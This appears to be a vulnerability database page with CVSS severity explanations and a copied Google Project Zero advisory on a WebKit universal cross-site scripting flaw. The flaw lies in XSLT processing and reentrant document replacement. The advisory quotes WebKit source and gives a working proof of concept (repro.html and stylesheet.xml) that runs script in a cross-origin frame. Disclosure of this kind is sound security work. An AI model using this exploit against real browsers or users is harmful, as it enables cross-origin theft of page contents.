The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: WebKit UXSS via XSLT and Nested Document Replacements
VULNERABILITY DETAILS
https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/xml/XSLTProcessor.cpp#L66
```
Ref<Document> XSLTProcessor::createDocumentFromSource(const String& sourceString,
const String& sourceEncoding, const String& sourceMIMEType, Node* sourceNode, Frame* frame)
{
Ref<Document> ownerDocument(sourceNode->document());
bool sourceIsDocument = (sourceNode == &ownerDocument.get());
String documentSource = sourceString;
RefPtr<Document> result;
if (sourceMIMEType == "text/plain") {
result = XMLDocument::createXHTML(frame, sourceIsDocument ? ownerDocument->url() : URL());
transformTextStringToXHTMLDocumentString(documentSource);
} else
result = DOMImplementation::createDocument(sourceMIMEType, frame, sourceIsDocument ? ownerDocument->url() : URL());
// Before parsing, we need to save & detach the old document and get the new document
// in place. We have to do this only if we're rendering the result document.
if (frame) {
[...]
frame->setDocument(result.copyRef());
}
auto decoder = TextResourceDecoder::create(sourceMIMEType);
decoder->setEncoding(sourceEncoding.isEmpty() ? UTF8Encoding() : TextEncoding(sourceEncoding), TextResourceDecoder::EncodingFromXMLHeader);
result->setDecoder(WTFMove(decoder));
result->setContent(documentSource);
```
https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/page/Frame.cpp#L248
```
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_documentIsBeingReplaced) // ***1***
return;
m_documentIsBeingReplaced = true;
[...]
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction(); // ***2***
m_doc = newDocument.copyRef();
```
`setDocument` calls `Document::prepareForDestruction`, which might trigger JavaScript execution via
a nested frame's "unload" event handler. Therefore the `m_documentIsBeingReplaced` flag has been
introduced to avoid reentrant calls. The problem is that by the time `setDocument` is called,
`newDocument` might already have a reference to a `Frame` object, and if the method returns early,
that reference will never get cleared by subsequent navigations. It's not possible to trigger
document replacement inside `setDocument` via a regular navigation request or a 'javascript:' URI
load; however, an attacker can use an XSLT transformation for that.
When the attacker has an extra document attached to a frame, they can navigate the frame to a
cross-origin page and issue a form submission request to a 'javascript:' URI using the extra
document to trigger UXSS.
VERSION
WebKit revision 245321.
It should affect the stable branch as well, but the test case crashes Safari 12.1.1 (14607.2.6.1.1).
REPRODUCION CASE
repro.html:
```
<body>
<script>
createFrame = doc => doc.body.appendChild(document.createElement('iframe'));
pi = document.createProcessingInstruction('xml-stylesheet',
'type="text/xml" href="stylesheet.xml"');
cache_frame = createFrame(document);
cache_frame.contentDocument.appendChild(pi);
setTimeout(() => {
victim_frame = createFrame(document);
child_frame_1 = createFrame(victim_frame.contentDocument);
child_frame_1.contentWindow.onunload = () => {
victim_frame.src = 'javascript:""';
try {
victim_frame.contentDocument.appendChild(document.createElement('html')).
appendChild(document.createElement('body'));
} catch { }
child_frame_2 = createFrame(victim_frame.contentDocument);
child_frame_2.contentWindow.onunload = () => {
doc = victim_frame.contentDocument;
doc.write('foo');
doc.firstChild.remove();
doc.appendChild(pi);
doc.appendChild(doc.createElement('root'));
doc.close();
}
}
victim_frame.src = 'javascript:""';
if (child_frame_1.xslt_script_run) {
victim_frame.src = 'http://example.com/';
victim_frame.onload = () => {
form = corrupted_doc.createElement('form');
form.action = 'javascript:alert(document.body.innerHTML)';
form.submit();
}
}
}, 2000);
</script>
</body>
```
stylesheet.xml:
```
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
<script>
<![CDATA[
document.body.lastChild.xslt_script_run = true;
]]>
</script>
<iframe src="javascript:top.corrupted_doc = frameElement.ownerDocument; frameElement.remove();"></iframe>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
```
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
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